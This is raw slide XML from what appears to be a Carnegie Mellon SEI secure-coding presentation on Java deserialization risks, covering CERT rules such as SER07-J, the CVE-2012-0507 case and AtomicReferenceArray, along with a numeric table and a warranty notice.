                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
                        <a:t>64 </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="C00000"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>8,462</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
                        <a:t>13.1</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
                        <a:t>E</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
                        <a:t>3/14</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="006600"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>1.5</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="006600"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="006600"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>8</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="006600"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="006600"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>53 </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="006600"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="006600"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>53 </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="006600"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="006600"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>0</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="006600"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>35.1</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
                        <a:t>F</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
                        <a:t>5/14</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
                        <a:t>403.0 </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
                        <a:t>27</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
                        <a:t>3114 </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="C00000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>723 </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="C00000"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
                        <a:t>2,391 </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="006600"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>7.7</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="006600"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="424308016"/>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pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Secure Coding and SCALe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SER07-J. Do not use the default serialized form for classes with implementation-defined invariants </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>EXP04-J. Do not pass arguments to certain Java Collections Framework methods that are a different type than the collection parameter type </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>OBJ03-J. Prevent heap pollution </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>IDS07-J</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>. Do not pass untrusted, unsanitized data to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Runtime.exec()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>method</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Summary</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1258192882"/>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Serialization Killer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Serialization can be used </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>maliciously. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>CVE-2012-0507</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> describes an exploit that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>bypassed Java's </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>applet security sandbox and run malicious code on a remote user's machine. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>deserialized </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>a malicious object that subverted Java's type system. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>nfected more </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>than </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>550,000 Macintosh computers, mostly </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>United </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>States and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Canada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1394744861"/>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Deserialization</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Deserialization is equivalent to object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>construction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Any and all </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>invariants enforced during object construction must also be enforced during deserialization. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>efault </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>serialization lacks any enforcement of class </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>invariants. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>reates </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>a new instance of the class without invoking any of the class's constructors. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>any </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>input validation checks in constructors are bypassed. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>programs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>must not use the default serialized form for any class with implementation-defined invariants.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1041734530"/>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spcAft>
                <a:spcPts val="1075"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>NO WARRANTY </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1075"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>THIS MATERIAL OF CARNEGIE MELLON UNIVERSITY AND ITS SOFTWARE ENGINEERING INSTITUTE IS FURNISHED ON AN “AS-IS" BASIS. CARNEGIE MELLON UNIVERSITY MAKES NO WARRANTIES OF ANY KIND, EITHER EXPRESSED OR IMPLIED, AS TO ANY MATTER INCLUDING, BUT NOT LIMITED TO, WARRANTY OF FITNESS FOR PURPOSE OR MERCHANTABILITY, EXCLUSIVITY, OR RESULTS OBTAINED FROM USE OF THE MATERIAL. CARNEGIE MELLON UNIVERSITY DOES NOT MAKE ANY WARRANTY OF ANY KIND WITH RESPECT TO FREEDOM FROM PATENT, TRADEMARK, OR COPYRIGHT INFRINGEMENT.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1075"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Use of any trademarks in this presentation is not intended in any way to infringe on the rights of the trademark holder.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1075"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>This Presentation may be reproduced in its entirety, without modification, and freely distributed in written or electronic form without requesting formal permission. Permission is required for any other use.  Requests for permission should be directed to the Software Engineering Institute at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>permission@sei.cmu.edu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1075"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>This work was created in the performance of Federal Government Contract Number FA8721-05-C-0003 with Carnegie Mellon University for the operation of the Software Engineering Institute, a federally funded research and development center. The Government of the United States has a royalty-free government-purpose license to use, duplicate, or disclose the work, in whole or in part and in any manner, and to have or permit others to do so, for government purposes pursuant to the copyright license under the clause at 252.227-7013.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2816692420"/>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p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>AtomicReferenceArray</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;E&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>Class  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="コンテンツ プレースホルダ 24"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>An </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>array of object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>references </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>in which elements may be updated atomically</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>Introduced in Java 5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" b="1" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>java.util.concurrent.atomic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>package</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>Parameterized type</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>Implements </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Serializable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>No customized </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>readObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t> method</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42216466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564" y="312821"/>
            <a:ext cx="8342435" cy="505326"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>AtomicReferenceArray</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;E&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t> Class </a:t>
            </a:r>
            <a:r>
